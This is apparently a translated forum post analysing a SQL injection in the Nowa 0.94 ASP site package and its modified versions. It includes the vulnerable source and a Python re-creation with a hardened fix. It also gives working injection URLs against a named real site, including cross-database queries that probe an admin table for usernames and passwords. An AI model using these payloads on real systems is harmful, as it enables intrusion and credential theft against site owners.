First, a disclaimer: this vulnerability was not discovered by me. I have only done one round of analysis on it; please point out anything I got wrong.
At the time this site package was regarded as a relatively secure whole-site system, and in fact it still is. (A later patch introduced an upload vulnerability, which is outside the scope of this post.) Because of that reputation the system has been adapted into many versions:
Nowa 0.94 (original version)
Xingxiang China whole site (modified version)
Lanyu (Blue Rain) whole site (modified version)
Luori (Sunset) whole site (modified version)
Liuxing (Meteor) whole site (modified version)---------------------------------------------(thanks to hak_ban for providing this one)
My own site,
http://www.918x.com, runs this system, and many other sites use it as well (including Xiaolu's 666w.com, heh).
Let's look at the original source of the vulnerable file first:
[code]
<%
sub article_body()
    dim totalart,Currentpage,totalpages,i,j,colname
    openarticle    ' opens the connection to article.mdb and sets up conn
    sql="select art_id,cat_id,art_title,art_date,art_count from art order by art_date DESC"
    if request("cat_id")<>"" then
        ' cat_id is concatenated as-is
        sql="select art_id,cat_id,art_title,art_date,art_count from art where cat_id="&request("cat_id")&" order by art_date DESC"
    elseif request("keyword")<>"" then
        ' request("select") is used as the column name without any check;
        ' only keyword passes through the filter in FORMAT.asp
        sql="select art_id,cat_id,art_title,art_date,art_count from art where "&request("select")&" like '%"&request("keyword")&"%' order by art_date DESC"
    elseif request("cat_id")<>"" and request("keyword")<>"" then
        ' never reached: a non-empty cat_id is already caught by the first branch
        sql="select art_id,cat_id,art_title,art_date,art_count from art where art_title or art_content like '%"&request("keyword")&"%' order by art_date DESC"
    end if
    set rs=server.createobject("adodb.recordset")
    rs.open sql,conn,1,1
    ' rest of article_body (rendering of rs) is not shown in the post
%>
[/code]
The key line is this one: sql="select art_id,cat_id,art_title,art_date,art_count from art where "&request("select")&" like '%"&request("keyword")&"%' order by art_date DESC"
In another file, FORMAT.asp, we find that the keyword request variable is filtered, but the select request variable is never properly checked.
So when we submit (%20 is a space)
http://www.918x.com/article.asp?select=art_title&keyword=1%20and%201=1
it does not work, but submitting
http://www.918x.com/article.asp?keyword=1&select=art_title%20and%201=1
http://www.918x.com/article.asp?keyword=1&select=art_title%20and%201=2
successfully achieves the injection: the first request returns results and the second does not, so the select parameter gives us a boolean oracle.
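To make the asymmetry concrete, here is an added example (it is not code from the Nowa package or from the original post) that re-creates the query construction of article_body() in Python beside a hardened version. The table and column names and the two payloads are taken from the post; the post does not show the FORMAT.asp filter itself, so the blacklist used for keyword below is an assumption, and the in-memory table is constructed sample data.

```python
"""Added example, not code from the Nowa package or the original post: the
article.asp query construction re-created in Python next to a hardened version,
so the asymmetry the post describes (keyword filtered, select not) can be seen
and tested.  Table and column names come from the post; the exact FORMAT.asp
filter is not shown there, so the blacklist below is an assumption."""
import re
import sqlite3

COLUMNS = "art_id,cat_id,art_title,art_date,art_count"

# Assumed stand-in for the FORMAT.asp keyword filter: strip quotes and a few SQL
# keywords.  Whatever the real filter did, the post says it ran on keyword only.
_BLACKLIST = re.compile(r"'|\b(?:and|or|select|union)\b", re.IGNORECASE)


def filter_keyword(value: str) -> str:
    """Blacklist filter applied to keyword (and to nothing else), as in the post."""
    return _BLACKLIST.sub("", value)


def build_sql_vulnerable(params: dict) -> str:
    """Mirror of article_body(): same branches, same string concatenation."""
    sql = f"select {COLUMNS} from art order by art_date DESC"
    cat_id = params.get("cat_id", "")
    keyword = params.get("keyword", "")
    if cat_id != "":
        # Concatenated raw as in the original; the post only discusses the select branch.
        sql = f"select {COLUMNS} from art where cat_id={cat_id} order by art_date DESC"
    elif keyword != "":
        column = params.get("select", "")  # never checked: this is the injection point
        keyword = filter_keyword(keyword)  # keyword is filtered, so payloads here fail
        sql = (f"select {COLUMNS} from art where {column} "
               f"like '%{keyword}%' order by art_date DESC")
    return sql


ALLOWED_COLUMNS = {"art_title", "art_content"}


def build_sql_hardened(params: dict) -> tuple:
    """Fix: whitelist the column identifier, bind every value as a parameter."""
    cat_id = params.get("cat_id", "")
    keyword = params.get("keyword", "")
    if cat_id != "":
        # int() rejects anything that is not a number; the value is bound, not concatenated
        return (f"select {COLUMNS} from art where cat_id=? order by art_date DESC",
                (int(cat_id),))
    if keyword != "":
        column = params.get("select", "art_title")
        if column not in ALLOWED_COLUMNS:
            # identifiers cannot be bound as parameters, so a whitelist is the only safe option
            raise ValueError(f"unexpected column name: {column!r}")
        return (f"select {COLUMNS} from art where {column} like ? order by art_date DESC",
                (f"%{keyword}%",))
    return (f"select {COLUMNS} from art order by art_date DESC", ())


def run_hardened(params: dict) -> list:
    """Run the hardened query against a constructed in-memory stand-in for article.mdb."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        create table art(art_id integer, cat_id integer, art_title text,
                         art_content text, art_date text, art_count integer);
        insert into art values
          (1, 1, 'Nowa 0.94 released', 'changelog', '2004-04-10', 10),
          (2, 2, 'Blue Rain skin',     'theme',     '2004-04-12', 3),
          (3, 1, 'Sunset skin',        'theme',     '2004-04-14', 7);
    """)
    sql, args = build_sql_hardened(params)
    rows = conn.execute(sql, args).fetchall()
    conn.close()
    return [row[0] for row in rows]  # art_id values, newest first


if __name__ == "__main__":
    # The post's two payloads: the first is neutered by the keyword filter,
    # the second lands intact in the WHERE clause.
    print(build_sql_vulnerable({"select": "art_title", "keyword": "1 and 1=1"}))
    print(build_sql_vulnerable({"keyword": "1", "select": "art_title and 1=1"}))
    print(run_hardened({"keyword": "skin", "select": "art_title"}))
```

The point of the hardened builder is that a column name is an identifier, not a value, so it cannot be passed as a bind parameter; the only correct fix is to compare it against a fixed list of allowed columns and reject everything else, while the keyword and cat_id values are bound rather than concatenated.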
The article system has two search functions: besides article.asp there is also download.asp. Looking at that code, however, there is no &request("select"); column names such as soft_name are written directly into the query. It looks as if the two queries were not written by the same person.
Now on to exploitation. We know this whole-site package uses 5 databases, and the passwords are stored in admin.mdb (by default).
The injection above, however, only hits article.mdb, so the most we can dump is the data in article.mdb's tables.
So can we query across databases?
First I need to know the file name of the database that holds the admin table; assume it is admin.asp. We also need the physical path of the database; assume it is d:\web\data\. Then query as follows:
http://www.918x.com/article.asp?keyword=1&select=art_title%20and%200<>(select%20count(*)%20from%20d:\web\data\admin.asp.admin%20where%20admin_name)
http://www.918x.com/article.asp?keyword=1&select=art_title%20and%200<>(select%20count(*)%20from%20d:\web\data\admin.asp.admin%20where%20admin_password)
If these return successfully, there is an admin table with admin_name and admin_password columns.
From there you can keep injecting and dump the username and password. I won't go into detail; everyone knows how.
This approach applies when:
1. you know the physical path of the database, and
2. the database is not in a web-accessible directory (it is in a parent directory or somewhere else), or it has anti-download protection (otherwise we could simply download the admin database directly; why go to the trouble of injecting?).
All in all the exploitation value is not great, especially since the 20040415 patch means the stored passwords are MD5-hashed anyway.